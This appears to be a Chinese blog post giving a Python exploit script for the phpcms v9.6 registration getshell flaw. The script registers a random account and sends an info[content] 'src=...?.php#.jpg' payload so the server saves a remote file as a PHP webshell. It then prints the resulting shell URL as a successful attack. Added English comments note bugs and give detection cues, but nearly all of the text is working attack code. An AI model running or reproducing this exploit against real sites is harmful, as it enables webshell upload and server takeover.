python学习之phpcms exp编写
针对 phpcms v9.6 前台注册 getshell 的 exp 编写；漏洞分析请参考网上已有的分析文章，此处不再赘述。
# -*- coding:utf-8 -*-
import re
import string
import requests
import random
import time
def getshell(host: str) -> None:
    """Probe *host* for the phpcms v9.6 member-registration issue and print the outcome.

    Flow, as written: wait, GET the registration page and treat any HTTP 200 as
    "file exists"; then POST a registration form whose ``info[content]`` field
    carries a ``src=...`` value, and scrape the response for the echoed ``src``.

    Args:
        host: Base URL of the target, with scheme and without a trailing slash
            (the code appends ``/index.php?...`` directly).

    Returns:
        None. Results are reported only through ``print``; every exception is
        swallowed by the bare ``except`` at the bottom and reported as
        ``"requests error"``, so a crash and a network failure look the same.
    """
    try:
        # print("checking whether the vulnerable file exists")
        # Fixed pacing delays between steps; no reason is given in the source.
        time.sleep(5)
        # NOTE: the backslash is inside the string literal, so the next physical
        # line must stay at column 0 -- any indent would leak into the UA value.
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/51.0. 2704.103 Safari/537.36"}
        # 8-char random [0-9a-z] token, reused below as both the username and the
        # local part of the e-mail address. Detection cue: registrations with a
        # random-looking name paired with "<same>@qq.com".
        ran=""
        for _ in range(8):
            ran = ran + random.choice('0123456789zyxwvutsrqponmlkjihgfedcba')
        url = host+'/index.php?m=member&c=index&a=register&siteid=1'
        # The "exists" check is only status_code == 200; it does not verify the
        # vulnerability. NOTE(review): requests.get's second positional parameter
        # is `params`, so `header` is sent as query-string pairs, not as headers.
        if(requests.get(url,header).status_code==200):
            print("漏洞文件存在")
            time.sleep(1)
            print("开始进行漏洞验证")
            time.sleep(5)
            headers = {
                'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Encoding':'gzip, deflate',
                'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                'Upgrade-Insecure-Requests':'1',
                'Content-Type': 'application/x-www-form-urlencoded',
                'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
            # Hand-built urlencoded body. `info[content]` holds the attacker-supplied
            # URL (here a loopback placeholder). For WAF/log rules, the distinctive
            # shape is a registration POST whose info[content] contains "src=" with
            # a "?.php#" suffix; the password is a fixed constant as well.
            data = "siteid=1&modelid=11&username="+ran+"&password=1123456&email="+ran+"@qq.com&info[content]=src=http://127.0.0.1/1.txt?.php#.jpg&dosubmit=1&protocol="
            s = requests.post(url=url,headers=headers,data=data)
            # str() of bytes yields the repr ("b'...'"), in which single quotes are
            # escaped as \'. The pattern below relies on that: it matches the
            # literal text 'src= up to the next escaped quote.
            s = str(s.content)
            shell = re.findall(r'\'src=(.*?)\\\'', s)
            # If nothing matched, shell[0] raises IndexError, which the bare except
            # turns into the misleading "requests error" message.
            print("攻击成功,请访问: \n"+shell[0])
        else:
            print("检测完毕,漏洞文件不存在!!!")
    # Bare except catches BaseException (including KeyboardInterrupt) and hides
    # the real failure; only a generic message is printed.
    except:
        print ("requests error")
if __name__ == '__main__':
    # Hard-coded dummy target (".kk" is not a public TLD); replace before running.
    target_host = "http://www.phpcms.kk"
    getshell(target_host)